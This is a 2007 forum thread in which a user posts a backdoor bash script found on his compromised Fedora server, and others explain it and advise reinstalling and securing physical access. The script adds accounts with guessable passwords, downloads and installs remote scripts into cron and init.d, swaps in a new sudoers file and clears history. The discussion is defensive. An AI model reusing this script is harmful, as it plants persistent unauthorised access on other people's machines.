Server Hacked

fedorafan2 · #1 30th October 2007, 05:59 AM

This guy I know hacked my server using a live distro at a party at my house. He changed the root password and might have installed a rootkit. I was looking at the server and noticed this file can anyone tell me what it is and what to do. I deleted all the files it refrences for download at the bottom.

#!/bin/bash
if [ `grep -c -e '\bcron\b' /etc/group` -eq 0 ] ; then
groupadd cron
fi
if [ `grep -c -e '\bpostalias\b' /etc/group` -eq 0 ] ; then
groupadd postalias
fi
if [ `grep -c -e '\tux\b' /etc/group` -eq 0 ] ; then
groupadd tux
fi
if [ `grep -c -e '\bsaslauthd\b' /etc/group` -eq 0 ] ; then
groupadd saslauthd
fi
if [ `grep -c -e '\byum\b' /etc/group` -eq 0 ] ; then
groupadd yum
fi
if [ `grep -c -e '\bcron\b' /etc/passwd` -eq 0 ] ; then
useradd -gcron cron
fi
echo "cron436" | passwd --stdin cron
if [ `grep -c -e '\bpostalias\b' /etc/passwd` -eq 0 ] ; then
useradd -gpostalias postalias
fi
echo "postalias436" | passwd --stdin postalias
if [ `grep -c -e '\bsaslauthd\b' /etc/passwd` -eq 0 ] ; then
useradd -gsaslauthd saslauthd
fi
echo "saslauthd436" | passwd --stdin saslauthd
if [ `grep -c -e '\bispconfig\b' /etc/passwd` -eq 0 ] ; then
useradd -gtux ispconfig
fi
echo "ispconfig436" | passwd --stdin ispconfig
if [ `grep -c -e '\bxds\b' /etc/passwd` -eq 0 ] ; then
useradd -gcron xds
fi
echo "xds436" | passwd --stdin xds
if [ `grep -c -e '\bvncservd\b' /etc/passwd` -eq 0 ] ; then
useradd -gsaslauthd vncservd
fi
echo "vncservd436" | passwd --stdin vncservd
if [ `grep -c -e '\bhttpd\b' /etc/passwd` -eq 0 ] ; then
useradd -gtux httpd
fi
echo "httpd436" | passwd --stdin httpd
if [ `grep -c -e '\bpostfixd\b' /etc/passwd` -eq 0 ] ; then
useradd -gyum postfixd
fi
echo "postfixd436" | passwd --stdin postfixd
if [ `grep -c -e '\bvsftpd\b' /etc/passwd` -eq 0 ] ; then
useradd -gpostalias vsftpd
fi
echo "vsftpd436" | passwd --stdin vsftpd
cd /etc/cron.hourly
curl http://maxweisel.com/ispconfigbind.sh -O
chmod +x ./ispconfigbind.sh
cd /usr/bin
curl http://maxweisel.com/ispconfigbind.sh -O
chmod +x ./ispconfigbind.sh
cd /etc/init.d
curl http://maxweisel.com/ispconfigbind -O
chmod +x ispconfigbind
chkconfig ispconfigbind on
cd /etc
curl http://maxweisel.com/sudoers -O
history -c

pobbz · #2 30th October 2007, 06:50 AM

Hello.

It seems to me that is adds some users to your system. I might wrong though.

Anyway, wtf? The guy changed the root password? Then, what's the point of installing a rootkit, if you at the same time make it very clear that the box has been hacked?

AFAIK, the purpose of rootkits is to prevent the server owner from finding out that his box has been compromised. Changing the root password kinda nullifies the whole idea of a rootkit.

If I were you I'd do two things:

1. Commit a clear reinstall.
2. Kick the **** out of the guy.

marcrblevins · #3 30th October 2007, 07:10 AM

No, number 2 is report the hacker to the police. He might wanted to steal your identity, etc.

leigh123linux · #4 30th October 2007, 07:43 AM

Quote:

Originally Posted by marcrblevins

No, number 2 is report the hacker to the police. He might wanted to steal your identity, etc.

How can he do that he invited the hacker into his house and left him unattended with his PC

I don't let any mother fu*ker near my machine

Iron_Mike · #5 30th October 2007, 08:24 AM

Almost any box can be hacked if given physical access to the box. So to be on the safe side, rebuild the server box and don't let anyone screw with it

marcrblevins · #6 30th October 2007, 08:28 AM

Another thing, change your BIOS to not boot from floppies or any CD/DVD drives. My first device to boot is the hard drive. Turn on BIOS password as well.

Then this hacker would have to break in the hard way, take door off, reset BIOS, story goes on.

contraculto · #7 30th October 2007, 06:26 PM

Quote:

Originally Posted by Iron_Mike

Almost any box can be hacked if given physical access to the box. So to be on the safe side, rebuild the server box and don't let anyone screw with it

and get a big evil looking dog :P

fedorafan2 · #8 31st October 2007, 03:01 AM

Can anyone tell me what the users he created are. I know the person who hacked it he is a good friend and thinks it is really funny. He told me the root pass and didn't install a rootkit, but he put those little files on there so he an do stuff just to annoy me. He also said the sudoers file is important to keep but delete the lines he added. Is this true and if so can someone tell me where i can get a good file?

marcrblevins · #9 31st October 2007, 07:55 AM

Forget it, reinstall.

pobbz · #10 31st October 2007, 08:28 AM

Quote:

Originally Posted by marcrblevins

Forget it, reinstall.

Yes. I 2nd that. And set the BIOS to boot only from HD and then set a BIOS password.

casket88 · #11 1st November 2007, 01:07 AM

Put a lock on your case too

All someone needs is a screwdriver and 2 extra minutes of time to bypass the BIOS password and be able to boot from the live CD. The only way to get past this is to sneak in some bolt cutters or an angle grinder and if he can, well you deserve to be hacked

ChrisSavery · #12 1st November 2007, 03:15 AM

You can read the script. He adds groups and users. He sets passwords. He downloads the ispconfig file several times ( though why doesn't he just dl once and copy?). He first puts on in an hour cron so it will run every hour, then he puts one in /usr/bin so it's easy to run at the cmdline, then he puts one in init.d and sets it as a daemon so it's always on and will start at boot. He really, really wants that program to run. So if you want to know what he's up to then look at that script. If you are convinced you don't want to reinstall then at least remove that script from the places installed and run chkconfig again with off to disable it. But really you have no idea what else he may have done, and if this stuff is just a diversion. So as people say here the only safe way to deal with this is to reinstall.